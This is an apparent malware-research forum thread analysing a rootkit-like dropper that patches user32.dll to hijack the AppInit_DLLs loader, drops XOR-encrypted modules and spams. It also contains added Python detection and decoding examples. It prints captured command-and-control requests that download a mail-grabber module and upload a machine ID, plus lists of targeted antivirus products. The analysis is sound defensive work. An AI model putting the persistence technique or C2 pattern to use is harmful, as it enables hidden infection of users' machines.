Full Version: 18.exe and friends (System File Patching - rootkit behavior)
B.I.S.S. Forums > Malware News , Research & Removal > Malware Playground
Kimberly

File details


Filename: 18.exe

File size: 132608 bytes
MD5: e8974f1bcf7297b67f2e22e76b7d3ced
SHA1: 02aae9ed2bed4f705dd5a5a35d1330a2e4345e2f
PEiD: ASPack v2.12 -> Alexey Solodovnikov
packers: Aspack
packers: ASPack
QUOTE
File 18.exe received on 01.01.2008 19:45:02
AhnLab-V3 2008.1.1.10 2007.12.31 -
AntiVir 7.6.0.46 2007.12.31 TR/Crypt.XDR.Gen
Authentium 4.93.8 2007.12.31 -
Avast 4.7.1098.0 2007.12.31 -
AVG 7.5.0.516 2008.01.01 SHeur.AJUJ
BitDefender 7.2 2008.01.01 -
CAT-QuickHeal 9.00 2007.12.31 -
ClamAV 0.91.2 2008.01.01 -
DrWeb 4.44.0.09170 2007.12.31 -
eSafe 7.0.15.0 2008.01.01 Suspicious File
eTrust-Vet 31.3.5421 2008.01.01 -
Ewido 4.0 2008.01.01 -
FileAdvisor 1 2008.01.01 -
Fortinet 3.14.0.0 2008.01.01 -
F-Prot 4.4.2.54 2007.12.31 -
F-Secure 6.70.13030.0 2008.01.01 W32/Smalltroj.BTCC
Ikarus T3.1.1.15 2008.01.01 -
Kaspersky 7.0.0.125 2008.01.01 -
McAfee 5196 2007.12.31 -
Microsoft 1.3109 2008.01.01 -
NOD32v2 2759 2008.01.01 -
Norman 5.80.02 2007.12.31 W32/Smalltroj.BTCC
Panda 9.0.0.4 2008.01.01 Suspicious file
Prevx1 V2 2008.01.01 -
Rising 20.24.52.00 2007.12.29 -
Sophos 4.24.0 2008.01.01 -
Sunbelt 2.2.907.0 2007.12.30 -
Symantec 10 2008.01.01 -
TheHacker 6.2.9.176 2008.01.01 -
VBA32 3.12.2.5 2007.12.31 -
VirusBuster 4.3.26:9 2008.01.01 -
Webwasher-Gateway 6.6.2 2007.12.31 Trojan.Crypt.XDR.Gen
______________________________

Filename: nvrsma.dll

File size: 179712 bytes
MD5: 1f8fb1df03431f507c440410c31db4ff
SHA1: fda38dbd3cbd745251e524f2e33d5b549e4971e8
PEiD: Microsoft Visual C++ 6.0 DLL
QUOTE
File nvrsma.dll received on 01.01.2008 20:30:17
AhnLab-V3 2008.1.1.10 2007.12.31 -
AntiVir 7.6.0.46 2007.12.31 TR/Crypt.XDR.Gen
Authentium 4.93.8 2007.12.31 -
Avast 4.7.1098.0 2007.12.31 -
AVG 7.5.0.516 2008.01.01 -
BitDefender 7.2 2008.01.01 -
CAT-QuickHeal 9.00 2007.12.31 -
ClamAV 0.91.2 2008.01.01 -
DrWeb 4.44.0.09170 2007.12.31 -
eSafe 7.0.15.0 2008.01.01 -
eTrust-Vet 31.3.5421 2008.01.01 -
Ewido 4.0 2008.01.01 -
FileAdvisor 1 2008.01.01 -
Fortinet 3.14.0.0 2008.01.01 -
F-Prot 4.4.2.54 2008.01.01 -
F-Secure 6.70.13030.0 2008.01.01 -
Ikarus T3.1.1.15 2008.01.01 -
Kaspersky 7.0.0.125 2008.01.01 -
McAfee 5196 2007.12.31 -
Microsoft 1.3109 2008.01.01 -
NOD32v2 2759 2008.01.01 -
Norman 5.80.02 2007.12.31 -
Panda 9.0.0.4 2008.01.01 -
Prevx1 V2 2008.01.01 -
Rising 20.24.52.00 2007.12.29 -
Sophos 4.24.0 2008.01.01 -
Sunbelt 2.2.907.0 2007.12.30 -
Symantec 10 2008.01.01 -
TheHacker 6.2.9.176 2008.01.01 -
VBA32 3.12.2.5 2007.12.31 -
VirusBuster 4.3.26:9 2008.01.01 -
Webwasher-Gateway 6.6.2 2007.12.31 Trojan.Crypt.XDR.Gen
______________________________

Filename: axt.hpl

File size: 83456 bytes
MD5: e7c62b593df2c2049879235b8ef21bd9
SHA1: 84685b682fa41a1b0c93b1061e18631c2d9561c3
PEiD: -

Filename: vtnr.gpg

File size: 68608 bytes
MD5: 8168bd0dd738dcd65466735cd8101daf
SHA1: 203acbaa92f5967415dc0445887ed7790bad4278
PEiD: -

Filename: mmg.cn

File size: 19456 bytes
MD5: ddb4d79b0696f0b6775c4fe256101c76
SHA1: 57bbd67959fbf917de8194fa2f8b7309f024ab35
PEiD: -

None of these files are detected at Virustotal because in their actual state they are just junk. They are PE files but have been encrypted using XOR keys.
We'll get back to them later on.

Visible signs


You might see the following lines in a Hijackthis log but they aren't really a sign that the malware is present. None of the actual scans are able to show this infection.

Logfile of Trend Micro HijackThis v2.0.2
...
F2 - REG:system.ini: Shell=c:\windows\explorer.exe
F2 - REG:system.ini: UserInit=c:\windows\system32\userinit.exe

Technical details


Registry changes.
  • Adds a loading point.
    QUOTE
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows "expInit_Dlls"
    Type: REG_SZ
    Data: nvrsma
  • Adds references that will be used by nvrsma.dll
    QUOTE
    HKEY_LOCAL_MACHINE\SOFTWARE\1 "31897356954C2CD3D41B221E3F24F99BBA"
    Type: REG_DWORD
    Data: 88, 40, 0C, 01
    HKEY_LOCAL_MACHINE\SOFTWARE\1 "31AC70412E939D72A9234CDEBB1AF5867B"
    Type: REG_SZ
    Data: nqrckqqlqdrqrirprhqoqrqdpipmmondlqmenondqkmrnkmh
    HKEY_LOCAL_MACHINE\SOFTWARE\1 "31C2E1E4D78E6A11B88DFA803456A1FFA5"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\2 "31897356954C2CD3D41B221E3F24F99BBA"
    Type: REG_DWORD
    Data: DB, 75, 78, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\2 "31AC70412E939D72A9234CDEBB1AF5867B"
    Type: REG_SZ
    Data: kgomncpjpnogoconproiodorrorcrmqjogqrqqrhqqnfrlqroj
    HKEY_LOCAL_MACHINE\SOFTWARE\2 "31C2E1E4D78E6A11B88DFA803456A1FFA5"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\3 "31897356954C2CD3D41B221E3F24F99BBA"
    Type: REG_DWORD
    Data: FC, 7E, B4, 04
    HKEY_LOCAL_MACHINE\SOFTWARE\3 "31AC70412E939D72A9234CDEBB1AF5867B"
    Type: REG_SZ
    Data: rnnhopmgmqnfnhnknemlmohoilijirjghlinimirejilih
    HKEY_LOCAL_MACHINE\SOFTWARE\3 "31C2E1E4D78E6A11B88DFA803456A1FFA5"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "mid"
    Type: REG_SZ
    Data: 062A99746AF84FC7B9A8C8FF3886F4A0B8AF4FD217184E43BC81EF3280DB69FC
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "st"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
  • Miscellaneous changes.
    QUOTE
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Shell"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: Explorer.exe
    New data: c:\windows\explorer.exe
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Userinit"
    Old type: REG_SZ
    New type: REG_SZ
    Old data: C:\WINDOWS\system32\userinit.exe,
    New data: c:\windows\system32\userinit.exe
Files added.
QUOTE
%windir%\Help\axt.hpl
Date: 1/2/2008 2:31 AM
Size: 83,456 bytes
%windir%\Help\vtnr.gpg
Date: 1/2/2008 2:31 AM
Size: 68,608 bytes
%system%\nvrsma.dll
Date: 1/2/2008 2:27 AM
Size: 179,712 bytes
%system%\fioakn
Date: 8/4/2004 1:00 PM
Size: 577,024 bytes
%system%\drivers\atmapi.sys
Date: 1/2/2008 2:31 AM
Size: 218 bytes
Files changed.
QUOTE
%system%\user32.dll
Old date: 8/4/2004 1:00 PM
New date: 1/2/2008 2:27 AM
Old size: 577,024 bytes
New size: 577,024 bytes
%system%\dllcache\user32.dll
Old date: 8/4/2004 1:00 PM
New date: 1/2/2008 2:27 AM
Old size: 577,024 bytes
New size: 577,024 bytes
Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).
%system% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).


What's so special about this infection


This infection is very complicated because several modules / functions overlap each other and it did also involve the patching of a system file. The malware did evolve because they added a couple of error checks since their first release. At any point if something goes wrong, the install is aborted.

Let’s try to cover as much as possible, so let’s step back to the very moment when 18.exe arrives on the computer.

1. What happens when 18.exe is run on the PC?
  • Checks if already installed or not by querying the HKEY_LOCAL_MACHINE\SOFTWARE\1 key.
  • Checks if SeDebugPrivilege is activated or not. If not, acquires it.
  • Duplicates Handles to folders (checks if failed or not)
  • Copies %system%\user32.dll to %system%\ [random name] – bhum in our sample.
  • Drops nvrsma.dll into the %system% folder.
  • Takes 2 random letters, appends pInit_Dlls to them and writes the loading point to the registry. expInit_Dlls in the screenshot / sample. Those 2 letters change each time you run the dropper.
  • Searches for the string " p i n i t _ d l l s" in %system%\ [random name] – bhum in our sample. Replaces “A p” with the same random letters as the registry value, “e x” in our test.
  • Copies %system%\ [random name] – bhum in our sample – as %system%\dllcache\user32.dll
  • Renames %system%\user32.dll as fioakn – this is also a random name.
  • Deletes %system%\ [random name] – bhum in our sample.
  • Since %system%\user32.dll is now missing, the file system protection will copy %system%\dllcache\user32.dll to the %system% folder. But … this copy isn’t genuine, it has been patched.

    Why patch user32.dll? First you need to understand the impact of AppInit_DLLs.
    Reference: Working with the AppInit_DLLs registry value.
    QUOTE
    The AppInit_DLLs value is found in the following registry key:

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows

    All the DLLs that are specified in this value are loaded by each Microsoft Windows-based application that is running in the current log on session.

    The AppInit DLLs are loaded by using the LoadLibrary() function during the DLL_PROCESS_ATTACH process of User32.dll. Therefore, executables that do not link with User32.dll do not load the AppInit DLLs. There are very few executables that do not link with User32.dll.

    Because of their early loading, only API functions that are exported from Kernel32.dll are safe to use in the initialization of the AppInit DLLs.

    We do not recommend that applications use this feature or rely on this feature. There are other techniques that can be used to achieve similar results.

    The AppInit_DLLs value has type "REG_SZ." This value has to specify a NULL-terminated string of DLLs that is delimited by spaces or by commas. Because spaces are used as delimiters, do not use long file names. The system does not recognize semicolons as delimiters for these DLLs.

    Typically, only the Administrators group and the LocalSystem account have write access to the key that contains the AppInit_DLLs value.
    With user32.dll patched, it no longer loads the DLLs listed in the AppInit_DLLs value but loads the DLLs listed in expInit_Dlls instead, meaning nvrsma.dll.
    Now, nvrsma.dll will not be loaded under every executable like the AppInit DLLs; it will only load under winlogon.exe with NT AUTHORITY\SYSTEM privileges. Each process will try but will encounter a file lock.
  • In order to fully load the infection, a reboot is needed. Previous versions simply killed explorer.exe, csrss.exe and winlogon.exe which often resulted in a BSOD. This time they coded a reboot.
    You’ll briefly notice a system message as the reboot is initiated with a delay of 1 second. In case you miss it, Event Viewer logs it.
In the second part of the analysis we will cover what happens after the reboot.
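Added example for this part of the thread (not a tool from the original post): a check for the user32.dll tampering described above. It assumes only what the analysis states: user32.dll carries the AppInit_DLLs value name as a UTF-16LE string, and the dropper rewrites the two letters before "pInit_Dlls" with two random ones, so the patched copy is the same size as the original. The two "images" in the block are constructed stand-ins, not real DLLs; on a live box you would feed it the bytes of %system%\user32.dll and of the dllcache copy.

```python
"""Check a user32.dll image for a tampered AppInit_DLLs value name (added example)."""
import re

# user32.dll stores the registry value name as UTF-16LE; the dropper locates
# " p i n i t _ d l l s" case-insensitively and rewrites the two letters before it.
TAIL = "pinit_dlls"
EXPECTED_PREFIX = "Ap"   # a genuine image reads "AppInit_DLLs"


def _utf16le(text: str) -> bytes:
    """Regex fragment matching text as UTF-16LE (letters case-insensitive via re.IGNORECASE)."""
    return b"".join(ch.encode("ascii") + b"\x00" for ch in text)


_PATTERN = re.compile(b"(?:[A-Za-z]\x00){2}" + _utf16le(TAIL), re.IGNORECASE)


def find_value_names(image: bytes):
    """Return [(offset, name)] for every '<two letters>pInit_Dlls' string in the image."""
    return [(m.start(), m.group(0).decode("utf-16-le")) for m in _PATTERN.finditer(image)]


def assess(image: bytes) -> dict:
    """Report every value name found and which ones do not carry the genuine 'Ap' prefix.

    A hijacked name (e.g. expInit_DLLs) is also the registry value to look for under
    HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows.
    """
    names = [name for _, name in find_value_names(image)]
    hijacked = [name for name in names if name[:2] != EXPECTED_PREFIX]
    # No value name at all is just as suspicious as a rewritten one.
    return {"names": names, "hijacked": hijacked, "patched": bool(hijacked) or not names}


def diff_offsets(reference: bytes, suspect: bytes):
    """Offsets where two same-sized images differ.

    The patch leaves the file size untouched, so a suspect user32.dll only
    reveals itself next to a known-good copy, byte by byte.
    """
    if len(reference) != len(suspect):
        return None
    return [i for i, (a, b) in enumerate(zip(reference, suspect)) if a != b]


# Constructed stand-ins: a DOS magic, padding, then the UTF-16LE value name.
CLEAN_IMAGE = b"MZ" + b"\x00" * 14 + "AppInit_DLLs".encode("utf-16-le") + b"\x00\x00"
PATCHED_IMAGE = CLEAN_IMAGE.replace("Ap".encode("utf-16-le"), "ex".encode("utf-16-le"), 1)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_IMAGE), ("patched", PATCHED_IMAGE)):
        print(label, assess(image))
    print("differing offsets:", diff_offsets(CLEAN_IMAGE, PATCHED_IMAGE))
```

Because the registry value name is derived from the same two random letters, the name reported in "hijacked" tells you exactly which value under the Windows key to inspect; a plain scan of AppInit_DLLs would miss it.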
Kimberly
After reboot, nvrsma.dll is loaded under the winlogon process.


A couple of minutes later several "events" occur.
  • nvrsma.dll drops the encrypted files axt.hpl and vtnr.gpg into the Windows Help folder and creates their corresponding registry entries under HKEY_LOCAL_MACHINE\SOFTWARE\1 and HKEY_LOCAL_MACHINE\SOFTWARE\2.
    Both files look scrambled because they are encrypted. Once loaded into memory they will be xored with the keys stored under their respective registry values. Once xored, the file becomes a functional PE.
    In its initial encrypted state, the file isn’t detected by Antivirus products but the xored file is already detected by a few vendors.
    QUOTE
    File Kim_axt.hex received on 01.02.2008 18:49:18
    AntiVir 7.6.0.46 2008.01.02 HEUR/Malware
    DrWeb 4.44.0.09170 2008.01.02 DLOADER.Trojan
    F-Secure 6.70.13030.0 2008.01.02 Backdoor.Win32.Agent.dpe
    Ikarus T3.1.1.15 2008.01.02 not-a-virus:AdWare.Win32.NaviPromo.k
    Kaspersky 7.0.0.125 2008.01.02 Backdoor.Win32.Agent.dpe
    VBA32 3.12.2.5 2008.01.02 suspected of Malware.Agent.32
    Webwasher-Gateway 6.6.2 2008.01.02 Heuristic.Malware.
    Both are Microsoft Visual C++ 6.0 DLLs.
  • atmapi.sys is also dropped in the %system%\drivers folder. It is not a driver; it’s just a text file. I suspect it is being used as a white list / blacklist for applications.
  • Creation of a unique identifier, stored under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "mid"
    062A99746AF84FC7B9A8C8FF3886F4A0 & B8AF4FD217184E43BC81EF3280DB69FC which gives us 062A99746AF84FC7B9A8C8FF3886F4A0B8AF4FD217184E43BC81EF3280DB69FC
    This is performed by axt.hpl using CoCreateGuid and StringFromGUID2
    QUOTE
    000104F8 100116F8 0 StringFromGUID2
    0001050A 1001170A 0 CoCreateGuid
  • Kaspersky gives several alerts about a hidden object under smss.exe. Remember, xored files are detected by a couple of vendors. Unfortunately it's impossible to know which modules are loaded, but I do suspect that both are mapped into memory.
  • Network activity is initiated by "winlogon.exe" but in reality this is performed by axt.hpl.
    QUOTE
    Hypertext Transfer Protocol
    POST /*****/ HTTP/1.0\r\n
    Content-Type: application/x-www-form-urlencoded\r\n
    Host: 91.194.76.142\r\n
    Content-Length: 112\r\n
    Pragma: no-cache\r\n
    \r\n
    Line-based text data: application/x-www-form-urlencoded
    s=0000201840911cf96bd0823fe18cb34e481712df4fa8b0a4f6883ff8c8a9b7cf48fa64799a260q0d1281l0t1q1d23297l0t1q2d769l0t1
    Notice the part in red? Read it backwards and we see our MID identifier here. The server replies back with random strings …
    QUOTE
    Hypertext Transfer Protocol
    HTTP/1.1 200 OK\r\n
    Date: Thu, 03 Jan 2008 15:44:48 GMT\r\n
    Server: Apache/2.0.59\r\n
    Expires: Mon, 26 Jul 1980 05:00:00 GMT\r\n
    Cache-Control: private\r\n
    Pragma: no-cache\r\n
    Content-Length: 194\r\n
    Connection: close\r\n
    Content-Type: text/html\r\n
    \r\n
    Line-based text data: text/html
    pdrrliqmqhkklhlilfpqomolpqplojpnpepkofplplpqocoiodpnkcorpklgonphlildlmpcloiqepii
    ijiifdiefcfdinfmfpfhfnikfrjeejehegedjieejdjpenerepepeperjodjdjcqdeckdedqdqdndqde
    dqdqifgpeggfgngdhrghhleheffleneq
    In previous versions either nibble.exe or cm.exe were downloaded from the server and that file was not encrypted. We notice an evolution here too. This time they chose to encrypt the downloaded file. The xor key will be stored in the registry under HKEY_LOCAL_MACHINE\SOFTWARE\3.
    The file will be saved as %windir%\Help\mmg.cn. Once decrypted, mmg.cn doesn't have a property tab but the module is called ModMailGrabber.dll.
    QUOTE
    Hypertext Transfer Protocol
    GET /*****/*****/mmg.cn HTTP/1.0\r\n
    Accept: */*\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: 91.194.76.142\r\n
    ~~~~~~~~~~: ~~~~~~~~~~\r\n
    \r\n
    Another transmission to the server. This time the MID identifier isn’t inverted.
    QUOTE
    Hypertext Transfer Protocol
    POST /*****/ HTTP/1.0\r\n
    Content-Type: application/x-www-form-urlencoded\r\n
    Host: 91.194.76.142\r\n
    Content-Length: 77\r\n
    Pragma: no-cache\r\n
    \r\n
    Line-based text data: application/x-www-form-urlencoded
    062A99746AF84FC7B9A8C8FF3886F4A0B8AF4FD217184E43BC81EF3280DB69FC\001\377\000LAAAAAAAAA
    Updating of the root certificates and certificates from VeriSign.
    QUOTE
    Hypertext Transfer Protocol
    HTTP/1.1 200 OK\r\n
    Content-Length: 569\r\n
    Content-Type: application/pkix-crl\r\n
    Last-Modified: Wed, 24 Aug 2005 18:22:06 GMT\r\n
    Accept-Ranges: bytes\r\n
    ETag: "09b60bbd8a8c51:417d"\r\n
    Server: Microsoft-IIS/6.0\r\n
    X-Powered-By: ASP.NET\r\n
    Date: Thu, 03 Jan 2008 15:45:32 GMT\r\n
    \r\n
    Certificate Revocation List

    Hypertext Transfer Protocol
    GET /pki/crl/products/CodeSignPCA2.crl HTTP/1.1\r\n
    Accept: */*\r\n
    User-Agent: Microsoft-CryptoAPI/5.131.2600.2180\r\n
    Host: crl.microsoft.com\r\n
    Connection: Keep-Alive\r\n
    Cache-Control: no-cache\r\n
    Pragma: no-cache\r\n
    \r\n

    Hypertext Transfer Protocol
    GET /pca3.crl HTTP/1.1\r\n
    Request Method: GET
    Request URI: /pca3.crl
    Request Version: HTTP/1.1
    Accept: */*\r\n
    User-Agent: Microsoft-CryptoAPI/5.131.2600.2180\r\n
    Host: crl.verisign.com\r\n
    Connection: Keep-Alive\r\n
    Cache-Control: no-cache\r\n
    Pragma: no-cache\r\n
    \r\n
  • Spam time. It’s not using port 25 like most mass mailers but operates on port 90 instead. Spamming is handled by axt.hpl.
  • In the meantime our bugger vtnr.gpg started to rewrite registry values. The exact purpose is as yet unknown to me. I strongly suspect it does eliminate other malware. (*)
    It goes through the process list, kills certain applications and deletes their corresponding run keys and/or services from the registry so that they don’t load on next reboot. (*) I strongly suspect axt.hpl doing this but I could be wrong. All files are linked and rely on each other. Due to the rootkit behavior it's not easy to analyse them.
(*) The hardcoded list in the different files is huge and we will try to clarify this a little bit in part 3.

Special thanks to Micha P. for providing me links to XOR tools.
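Added example for the decryption step described in this part (not code from the original post, and not one of the XOR tools mentioned above). The analysis says axt.hpl, vtnr.gpg and mmg.cn are XORed in memory with keys kept under HKLM\SOFTWARE\1, \2 and \3; the assumption made here is that the 4-byte REG_DWORD value dumped as "88, 40, 0C, 01" is a repeating 4-byte XOR key, which the post does not spell out. The encrypted buffer is constructed, not one of the real files, and the key-recovery helper only assumes the usual MSVC DOS header bytes.

```python
"""XOR-decode a dropped module with the key the dropper keeps in the registry (added example)."""
import struct


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def key_from_reg_dword(dump: str) -> bytes:
    """Turn the 'Data: 88, 40, 0C, 01' form of a REG_DWORD dump into 4 key bytes, in dump order.

    Assumption (not stated in the post): the bytes are used as a 4-byte XOR key.
    """
    return bytes(int(part, 16) for part in dump.split(","))


def looks_like_pe(image: bytes) -> bool:
    """True if the buffer has an MZ header and a PE signature at e_lfanew."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    return image[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_key(blob: bytes, key_len: int = 4) -> bytes:
    """Known-plaintext recovery for when the registry value is unavailable.

    MSVC-built PE files open with b'MZ\\x90\\x00', so XORing those bytes with
    the first ciphertext bytes yields a key of up to 4 bytes.
    """
    known = b"MZ\x90\x00"
    if key_len > len(known):
        raise ValueError("only keys up to 4 bytes can be recovered from the DOS header")
    return bytes(blob[i] ^ known[i] for i in range(key_len))


def decrypt_module(blob: bytes, reg_dword_dump: str):
    """Decrypt with the registry key; return the PE, or None if the result is not a PE."""
    plain = xor_bytes(blob, key_from_reg_dword(reg_dword_dump))
    return plain if looks_like_pe(plain) else None


def build_sample_pe() -> bytes:
    """Constructed minimal PE-shaped buffer: DOS header, e_lfanew = 0x40, PE signature."""
    dos = bytearray(b"MZ\x90\x00" + b"\x00" * 0x3C)
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 20


SAMPLE_KEY_DUMP = "88, 40, 0C, 01"   # value from the HKLM\SOFTWARE\1 dump above
ENCRYPTED_SAMPLE = xor_bytes(build_sample_pe(), key_from_reg_dword(SAMPLE_KEY_DUMP))

if __name__ == "__main__":
    print("encrypted looks like PE:", looks_like_pe(ENCRYPTED_SAMPLE))
    print("recovered key:", recover_key(ENCRYPTED_SAMPLE).hex())
    print("decrypted is PE:", decrypt_module(ENCRYPTED_SAMPLE, SAMPLE_KEY_DUMP) is not None)
```

The MZ/PE check is what tells you the key was right: a wrong key (the all-zero value under HKLM\SOFTWARE\2, for instance) leaves the buffer as scrambled as it was on disk, which is exactly why the dropped files score nothing at VirusTotal until they are decoded.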
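A second added example for this part (again not code from the original post): parsing the two captured POST requests and checking which way the MID identifier travels, since the first request sends it reversed and lower-cased while the later one sends it as-is. Both requests are reconstructed from the dumps above, including the author's "/*****/" path redaction; the MID is the value from HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion "mid".

```python
"""Parse the captured C2 POSTs and locate the (possibly reversed) MID (added example)."""

MID = "062A99746AF84FC7B9A8C8FF3886F4A0B8AF4FD217184E43BC81EF3280DB69FC"


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.0 request into request line, headers (lower-cased names) and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, version = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def locate_mid(body: bytes, mid: str = MID):
    """Return ('forward', offset) or ('reversed', offset) if the MID is in the body, else None.

    The comparison is case-insensitive because the first POST lower-cases the hex.
    """
    text = body.decode("latin-1").lower()
    for direction, needle in (("forward", mid.lower()), ("reversed", mid.lower()[::-1])):
        offset = text.find(needle)
        if offset != -1:
            return direction, offset
    return None


def triage_request(raw: bytes, mid: str = MID) -> dict:
    """The fields a detection rule would want from one captured request."""
    req = parse_http_request(raw)
    declared = int(req["headers"].get("content-length", "0"))
    return {
        "host": req["headers"].get("host"),
        "method": req["method"],
        "length_ok": declared == len(req["body"]),
        "mid": locate_mid(req["body"], mid),
    }


# Reconstructed from the first capture above (Content-Length 112).
REQUEST_1 = (
    b"POST /*****/ HTTP/1.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Host: 91.194.76.142\r\n"
    b"Content-Length: 112\r\n"
    b"Pragma: no-cache\r\n"
    b"\r\n"
    b"s=0000201840911cf96bd0823fe18cb34e481712df4fa8b0a4f6883ff8c8a9b7cf48fa64799a260"
    b"q0d1281l0t1q1d23297l0t1q2d769l0t1"
)

# Reconstructed from the later capture (Content-Length 77): MID, three raw bytes, then text.
REQUEST_2 = (
    b"POST /*****/ HTTP/1.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Host: 91.194.76.142\r\n"
    b"Content-Length: 77\r\n"
    b"Pragma: no-cache\r\n"
    b"\r\n"
    + MID.encode("ascii") + b"\x01\xff\x00LAAAAAAAAA"
)

if __name__ == "__main__":
    print(triage_request(REQUEST_1))
    print(triage_request(REQUEST_2))
```

Both requests pass the Content-Length check, so the lengths quoted in the captures are consistent with the bodies shown; the reversed hit lands at offset 15 of the first body, right after the "s=0000201840911" prefix the author left uninterpreted.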
Kimberly

File strings


Below is a partial list of strings found in the different modules.

axt.hpl
CODE
00010532   10011732      0   URLDownloadToFileA
0001056C   1001176C      0   DnsRecordListFree
00010580   10011780      0   DnsQuery_A
0001058C   1001178C      0   DNSAPI.dll
00010642   10011842      0   ModHttpCommunication.dll
0001069E   1001189E      0   NotifyFromServer
000106AF   100118AF      0   NotifyMailer
000106BC   100118BC      0   NotifyServer
000111F8   100129F8      0   HELO %s
00011204   10012A04      0   MAIL FROM: <%s>
00011218   10012A18      0   RCPT TO: <%s>
00012200   10013A00      0   ModCommunication
0001221C   10013A1C      0   ke_RegisterAndLoadNewModule
00012238   10013A38      0   \help\
00012244   10013A44      0   softstat
0001226C   10013A6C      0   ke_GetNextObj
00012288   10013A88      0   c:\crashdump.log
000122A0   10013AA0      0   SOFTWARE\Microsoft\Windows\CurrentVersion
00012384   10013B84      0   Content-Type: application/x-www-form-urlencoded
0001249C   10013C9C      0   .log.htm
000124A8   10013CA8      0   main.log.htm
000124B8   10013CB8      0   \internet explorer
000124CC   10013CCC      0   ProgramFilesDir
000124DC   10013CDC      0   Software\
000124E8   10013CE8      0   mcafee
000124F0   10013CF0      0   McAfee\VirusScan
00012504   10013D04      0   drweb
0001250C   10013D0C      0   Doctor Web, Ltd.
00012520   10013D20      0   fprot
00012528   10013D28      0   FRISK Software International
0001254C   10013D4C      0   KasperskyLab
0001255C   10013D5C      0   antivir
00012564   10013D64      0   SYSTEM\ControlSet001\Services\avgntflt
0001258C   10013D8C      0   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AntiVir PersonalEdition Classic
000125E0   10013DE0      0   avast
000125E8   10013DE8      0   ALWIL Software\Avast
00012608   10013E08      0   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ClamAV
00012648   10013E48      0   Ukranian Antivirus center
00012668   10013E68      0   *\shellex\ContextMenuHandlers\NOD32 Context Menu Shell Extension
000126AC   10013EAC      0   bitdef
000126B4   10013EB4      0   SOFTWIN\BitDefender Desktop\Maintenance\Install
000126E8   10013EE8      0   Vba32
000126F0   10013EF0      0   symantec
000126FC   10013EFC      0   Symantec\Symantec AntiVirus
00012718   10013F18      0   panda
00012720   10013F20      0   Panda Software
00012730   10013F30      0   spy_adaware
0001273C   10013F3C      0   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ad-Aware SE Personal
00012788   10013F88      0   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ad-aware 6 Personal
000127D0   10013FD0      0   spy_spybot
000127DC   10013FDC      0   PepiMK Software\SpybotSnD
000127F8   10013FF8      0   spy_arovax
00012804   10014004      0   Arovax AntiSpyware
00012818   10014018      0   spy_avg
00012820   10014020      0   Grisoft\AVGAntiSpyware
00012838   10014038      0   spy_ppatrol
00012844   10014044      0   ComputerAssociates\eTrustPestPatrol
00012868   10014068      0   spy_mcafee
00012874   10014074      0   McAfee\McAfee AntiSpyware
00012890   10014090      0   spy_begone
0001289C   1001409C      0   Spyware Begone!
000128AC   100140AC      0   spy_doctor
000128B8   100140B8      0   Chilkat Software, Inc.
000128D0   100140D0      0   spy_blaster
000128DC   100140DC      0   SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpywareBlaster_is1
00012924   10014124      0   spy_sweeper
00012930   10014130      0   AllFilesystemObjects\shellex\ContextMenuHandlers\SpySweeper
0001296C   1001416C      0   spy_msdef
00012978   10014178      0   SYSTEM\CurrentControlSet\Services\WinDefend
000129A4   100141A4      0   sf_vmware
000129B0   100141B0      0   VMware, Inc.
000129C0   100141C0      0   hp_vmtools
000129CC   100141CC      0   VMware, Inc.\VMware Tools
000129E8   100141E8      0   hp_redpill
000129F4   100141F4      0   hp_vmio
00012CA6   100160A6      0   VS_VERSION_INFO
00012D02   10016102      0   StringFileInfo
00012D26   10016126      0   040904b0
00012D3E   1001613E      0   Comments
00012D56   10016156      0   CompanyName
00012D76   10016176      0   FileDescription
00012D98   10016198      0   ModHttpCommunication DLL
00012DD2   100161D2      0   FileVersion
00012DEC   100161EC      0   1, 7, 0, 1
00012E0A   1001620A      0   InternalName
00012E2A   1001622A      0   LegalCopyright
